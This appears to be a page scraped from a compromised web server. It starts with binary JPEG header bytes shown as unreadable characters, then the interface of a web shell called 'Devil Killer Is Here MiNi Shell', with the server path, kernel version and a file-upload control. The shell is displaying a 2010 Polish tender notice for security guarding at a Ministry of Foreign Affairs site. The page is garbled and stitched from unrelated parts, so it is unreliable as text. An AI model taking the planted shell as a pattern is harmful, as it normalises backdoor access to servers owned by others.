JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/368518-N-2010.html

<p class="kh_header"><b>Warszawa: Kompleksowa ochrona obiektu krajowego MSZ przy ul. Tynieckiej w Warszawie.</b><br>
<b>Numer ogłoszenia: 368518 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa ochrona obiektu krajowego MSZ przy ul. Tynieckiej w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa ochrona obiektu krajowego MSZ przy ul. Tynieckiej w Warszawie.
Przedmiot zamówienia obejmuje: dozór i ochronę obiektu MSZ w Warszawie wskazanego w pkt. 1. ppkt. a) wraz z terenem do niego przyległym i  mieniem się w nim znajdującym. Usługa ochrony musi być wykonywana przez licencjonowanych pracowników ochrony osób i mienia wraz z monitorowaniem lokalnych elektronicznych systemów antywłamaniowych i antynapadowych, wykonaniem interwencji na alarmy generowane przez te systemy przez grupę interwencyjną:
a)	obiekt przy ul. Tynieckiej 15-17, ogrodzony teren biurowy, posterunek jednoosobowy dwuzmianowyw dzień, w godzinach od 7.00 do 19.00 oraz jednoosobowy w nocy, w godzinach od 19.00 do 7.00, ochrona bez broni palnej;
b)	oraz patrol interwencyjny całodobowy, nieuzbrojony - na wezwanie - we wszystkie dni kalendarzowe w roku (dni robocze, soboty, niedziele, święta i inne dni wolne od pracy). Czas reakcji  na wezwanie nie może być dłuższy niż 15 min. (wg. potrzeb).
2. Zakres działania i odpowiedzialność Wykonawcy: 
a)	całodobowa ochrona fizyczna obiektu wraz z mieniem w nim się znajdującym zgodnie 
z pkt. 1 ppkt. a);
b)	monitorowanie pracy technicznych środków wspomagających ochronę obiektu, informowanie Kierownika Sekcji Ochrony MSZ o ich niesprawności;
c)	zapewnienie natychmiastowej reakcji zmotoryzowanych, nieuzbrojonych grup interwencyjnych na sygnały alarmowe generowane przez techniczne środki wspomagające ochronę obiektu;  czas reakcji nie może być dłuższy niż 15 min.;  
d)	przekazywanie Policji osób ujętych podczas wykonywania zadań ochronnych, zgodnie z odrębnymi przepisami;
e)	współpraca z Policją na zasadach określonych w odrębnych przepisach;
f)	przyjmowanie i przekazywanie meldunków w systemie dyżurnych służb operacyjnych MSZ oraz powiadamianie wskazanych osób funkcyjnych MSZ  o zdarzeniach;
g)	współpraca z wewnętrzną służbą dyżurną MSZ DOOK oraz BOR;
h)	wykonywanie innych zadań określonych w Instrukcji Bezpieczeństwa Obiektu zwanej dalej Instrukcją Ochrony przekazanej Wykonawcy po podpisaniu umowy, a zawierającej m.in. :
-    zadania w zakresie przestrzegania regulaminowego toku pracy na obiekcie,
-  opracowanie zakresów obowiązków pracowników ochrony Wykonawcy w toku pełnienia  dyżurów oraz uzyskanie zgody na powyższe Zamawiającego; 
- opracowanie zasad postępowania pracowników ochrony Wykonawcy w sytuacjach odbiegających od norm - kryzysowych oraz uzyskanie zgody na powyższe Zamawiającego;
-  zapewnienie przestrzegania w rejonie ochrony przepisów ppoż. i bhp przez wszystkich pracowników Wykonawcy w toku pełnienia dyżurów;
i)	Wykonawca w terminie 7 dni od dnia otrzymania Instrukcji opracuje Plan  Ochrony obiektu, uwzględniając zasady i warunki wykonywania zadań ochrony, wynikające 
z Instrukcji Ochrony oraz innych zaleceń Zamawiającego;
j)	Wykonawca zapewnia wyposażenie ochranianego terenu w urządzenia kontroli obchodu.
3. Przedmiot działania pracowników ochrony Wykonawcy: 
a)  całodobowa ochrona fizyczna obiektu w zakresie zapobiegania: 
-	przestępstwom przeciwko życiu i zdrowiu (określonych w Rozdziale XIX K.K.),
-	przestępstwom przeciwko bezpieczeństwu powszechnemu (określonych w rozdziale XX K.K.),
-	przestępstwom przeciwko środowisku (określonych w Rozdziale XXII K.K.),
-	przestępstwom przeciwko działalności instytucji państwowych oraz samorządu terytorialnego (określonych w Rozdziale XXIX K.K.),
-	przestępstwom przeciwko porządkowi publicznemu (określonych w Rozdziale XXXII K.K.),
-	przestępstwom przeciwko ochronie informacji (określonych w Rozdziale XXXIII K.K.),
-	przestępstwom przeciwko mieniu (określonym w Rozdziale XXXV K.K.);
b)  prowadzenie ciągłej obserwacji w ochranianym obiekcie;
c)  natychmiastowe  reagowanie na każdy sygnał o naruszeniu systemu ochrony obiektu oraz ścisłe wykonywanie zadań ochronnych szczegółowo określonych w Instrukcji ochrony, bez względu na porę doby i warunki atmosferyczne;
d) kontrolowanie i egzekwowanie przestrzegania przez osoby przebywające na terenie ochranianego obiektu ustalonych norm zachowania oraz zasad porządku publicznego;
e)	ujmowanie sprawców przestępstw określonych w pkt. 3. lit. a) dokonanych na terenie ochranianego obiektu w celu niezwłocznego przekazania tych osób Policji,Straży Miejskiej według odrębnych przepisów;
f)	prowadzenie nieprzerwanie kontroli ruchu osób wchodzących i wychodzących
z ochranianych obiektów;
g)	prowadzenie na bieżąco ewidencji interesantów i gości przybywających do komórek organizacyjnych MSZ mieszczących się w ochranianym obiekcie;
h)	kierowanie interesantów i gości do uprawnionych osób funkcyjnych z komórek organizacyjnych MSZ mieszczących się w ochranianym obiekcie;
i)	 prowadzenie na bieżąco dokumentacji służby dyżurnej określonej w Instrukcji ochrony;
j)	przeciwdziałanie wszelkim zagrożeniom wynikającym z nieprzestrzegania zasad porządkowych określonych w Instrukcji ochrony i innych integralnych z nią dokumentów;
k)	przyjmowanie i przekazywanie meldunków w systemie dyżurnych służb MSZ oraz powiadamianie wyznaczonych osób funkcyjnych;
l)	alarmowanie i powiadamianie pracowników służb dyżurnych MSZ oraz przekazywanie sygnałów ostrzegania zgodnie z Instrukcją ochrony;
m)	prowadzenie na bieżąco ewidencji, przyjmowanie na przechowanie oraz wydawanie osobom upoważnionym przez osoby wymienione w Instrukcji ochrony kluczy użytku bieżącego oraz kontrola zamknięcia pomieszczeń służbowych w obiekcie;
n)	egzekwowanie zasad przestrzegania porządku publicznego przez wszystkie osoby znajdujące się na terenie ochranianego obiektu;
o)	reagowanie w przypadku niepodporządkowania się poleceniom osób, wobec których podejmowana jest interwencja, wymuszanie posłuszeństwa wszelkimi środkami z użyciem  środków przymusu bezpośredniego z zachowaniem zasad określonych w Rozporządzeniu Rady Ministrów z dnia 18 listopada 1998 r. w sprawie szczegółowego trybu działań ochrony, podejmowanych wobec osób znajdujących się w granicach chronionych obiektów i obszarów;
p)	współdziałanie w wykonywaniu zadań ochronnych z Policja, Strażą Miejską oraz jednostkami ochrony ppoż., zgodnie z Instrukcją ochrony;
q)	powiadamianie telefoniczne w przypadku wystąpienia awarii sieci energetycznej, telefonicznej i wodociągowej: Pogotowie wodociągowe, Pogotowie energetyczne, komenda ochrony, wyznaczonych pracowników oraz podejmowanie działań mających na celu zapobieganie skutkom awarii, zgodnie z instrukcją ochrony obiektu;
r)	prowadzenie kontroli - obchodów - po godzinach urzędowania co dwie godziny - oraz odnotowywanie tego faktu za pomocą urządzeń kontroli obchodu;
s)	sporządzanie pisemnych meldunków z przebiegu dyżuru w stosownej dokumentacji.

4. Sposób realizacji przedmiotu zamówienia:
a)	ochrona fizyczna obiektu realizowana będzie w systemie całodobowej i ciągłej ochrony w godzinach od 07.00 do 07.00 dnia następnego, tj. 24 godzinny system ochronny, w systemie dwuzmianowym - tj. od 7.00 do 19.00 oraz od 19.00 do 7.00 we wszystkie dni kalendarzowe roku (dni robocze, soboty, niedziele, święta, dni wolne od pracy) przez jednego pracownika ochrony bez broni palnej na zmianie;
b)	patrol interwencyjny nieuzbrojony, całodobowy, na wezwanie - we wszystkie dni kalendarzowe w roku (dni robocze, soboty, niedziele, święta i inne dni wolne od pracy), czas reakcji na wezwanie nie może być dłuższy niż 15 min.

5. Wymagania wobec pracowników ochrony Wykonawcy: 
a)	wszyscy pracownicy ochrony realizujący usługę muszą być pracownikami wykonującymi zadania ochrony wyłącznie w obiekcie określonym przez Zamawiającego;
b)	wprowadzenie nowego pracownika ochrony do obiektu następuje wyłącznie po wcześniejszym (co najmniej 48 godz. wyprzedzeniem) zawiadomieniu Zamawiającego;
c)	wszyscy pracownicy ochrony muszą odbyć szkolenie dotyczące zasad ochrony informacji niejawnych i posiadać zaświadczenia o jego ukończeniu. Przeprowadzenie takiego szkolenia leży w gestii Wykonawcy;
d)	wszyscy pracownicy ochrony realizujący usługę muszą być pracownikami ochrony fizycznej i posiadać licencję co najmniej I stopnia;
e)	wszyscy pracownicy ochrony realizujący usługę muszą posiadać poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych oznaczonych klauzulą co najmniej zastrzeżone, zgodnie z art. 36 ustawy o ochronie informacji niejawnych z dnia 22.01.1999 r., wystawione dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz osób nadzorujących wykonanie przedmiotu zamówienia ze strony Wykonawcy.

6. Zadania pracowników ochrony podczas pełnienia służby ochronnej: 
Szczegółowe zadania pracowników ochrony i sposób ich realizacji został określony w Instrukcji ochrony, która zostanie przekazana Wykonawcy po podpisaniu umowy.

7. Uprawnienia osób funkcyjnych MSZ w stosunku do pracowników ochrony oraz zakres i sposób prowadzenia przez przełożonych i osoby upoważnione do kontroli wykonywanych zadań ochronnych :
Osoby upoważnione do kontroli wykonywanych zadań ochronnych ze strony Zamawiającego mają prawo do:
-prowadzenia bieżącej kontroli realizacji zadań ochronnych przez pracowników ochrony o każdej porze dnia i nocy;
-	dokonywania zmian w Instrukcji ochrony stosownie do sytuacji i wynikających z niej zagrożeń, nie zmieniających innych postanowień podpisanej umowy,
-	wnioskowanie do wykonawcy o zmianę pracownika ochrony w przypadku, gdy istnieje podejrzenie o nie dochowanie w tajemnicy informacji, z którymi zapoznał się w czasie wykonywania zadań ochronnych, lub sposób wykonania przez niego  zadań ochronnych budzi zastrzeżenia,
-	 wydawania poleceń pracownikom ochrony związanych z postępowaniem wobec osób postronnym ujętych na terenie chronionym,
-	kontrolowania stanu zabezpieczenia ochranianego obiektu wraz z przyległym terenem chronionym,
-	uzgadniania z przedstawicielem Wykonawcy sposobu i wariantów stosowanych w pełnieniu służby ochronnej,
-	żądania od pracowników ochrony Wykonawcy doraźnych meldunków o sytuacji na ochranianym obiekcie,
-	zwracania uwagi kontrolowanym pracownikom ochrony na stwierdzone niedociągnięcia w czasie pełnionej służby,
-	 żądania od kontrolowanych pracowników ochrony Wykonawcy usunięcia stwierdzonych niedociągnięć i nieprawidłowości,
-	kontrolowania zapisów danych z elektronicznego systemu kontroli CCTV (monitoringu zewnętrznego i wewnętrznego obiektu).

8. Wyposażenie oraz umundurowanie pracowników ochrony stanowi :
a)	środki łączności bezprzewodowej,
b)	latarka,
c)	opatrunek osobisty,
d)	środki przymusu bezpośredniego określone przez Wykonawcę,
e)	w nadajnik monitorujący system sygnalizacji włamania i napadu oraz
       bezprzewodowe przyciski napadowe wyposaża Wykonawca,
f)	umundurowanie o jednolitym wzorze dla wszystkich pracowników ochrony, oznaczone w widocznym miejscu emblematem według wzoru Wykonawcy,
g)	identyfikator ze zdjęciem.
9. Skutki nie wykonania obowiązków ochrony: 
Niewykonanie, nienależyte wykonanie lub zaniechanie wykonania obowiązków ochrony, będzie skutkowało pociągnięciem do odpowiedzialności cywilnej, karnej lub finansowej Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.30.00-5, 79.71.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 4 000,00 zł (słownie: cztery tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający sie o udzielenie zamówienia muszą posiadać koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji  w zakresie usług ochrony osób i mienia na podstawie ustawy z dnia 22 sierpnia 1997roku o ochronie osób i mienia (Dz. U. z 1997r. Nr 114, poz. 740).
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA-NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający sie o udzielenie zamówienia muszą wykazać się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku, tj.: w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują co najmniej 2 usługi w zakresie ochrony  osób i mienia w budynkach użyteczności publicznej przez które należy rozumieć: budynki przeznaczone na potrzeby oświaty, sportu, administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, obsługi pasażerów w transporcie kolejowym, oraz inne ogólnodostępne budynki przeznaczone do wykonywania podobnych funkcji w tym także budynki biurowe 
i socjalne o wartości co najmniej 100 000,00 zł. brutto każda.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA-NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA-NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o udzielenie zamówienia muszą dysponować osobami zdolnymi do wykonania zamówienia, tj.  co najmniej 4 osobami posiadającymi udokumentowane kwalifikacje zawodowe do wykonywania ochrony fizycznej, które muszą posiadać:
-licencję co najmniej pierwszego stopnia, w oparciu o ustawę z dnia 22 sierpnia 1997r. o ochronie  osób i mienia (Dz. U. z 1997r. Nr 114, poz. 740);
-zaświadczenia o odbyciu szkolenia z ochrony informacji niejawnych oraz poświadczenia bezpieczeństwa w zakresie ochrony informacji niejawnych o klauzuli co najmniej zastrzeżone , zgodnie z art. 36 ustawy o ochronie informacji niejawnych z dnia 22.01.1999 r. (Dz. U. z 2005 r., Nr 196, poz. 1631 z późniejszymi zmianami) wystawione dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz osób nadzorujących wykonanie przedmiotu zamówienia ze strony Wykonawcy;
w tym:
- wykonawcy muszą dysponować nieuzbrojoną grupą interwencyjną, składającą się z co najmniej 2 osób, wyposażoną w oznakowany środek transportu, pozostającą w całodobowej dyspozycji Zamawiającego (we wszystkie dni kalendarzowe w roku), z zadaniem reagowania na sytuacje zagrożenia w obiektach objętych przedmiotem zamówienia, na wezwanie Zamawiającego, o czasie reakcji nie dłuższym niż 15 minut.
Jeżeli Wykonawca będzie wykonywał zamówienie przy udziale większej liczby osób, wszystkie te osoby będą musiały posiadać kwalifikacje zawodowe, o których mowa powyżej.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA-NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający sie o udzielenie zamówienia muszą być ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w kwocie nie mniejszej niż 100 000, 00 zł.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA-NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

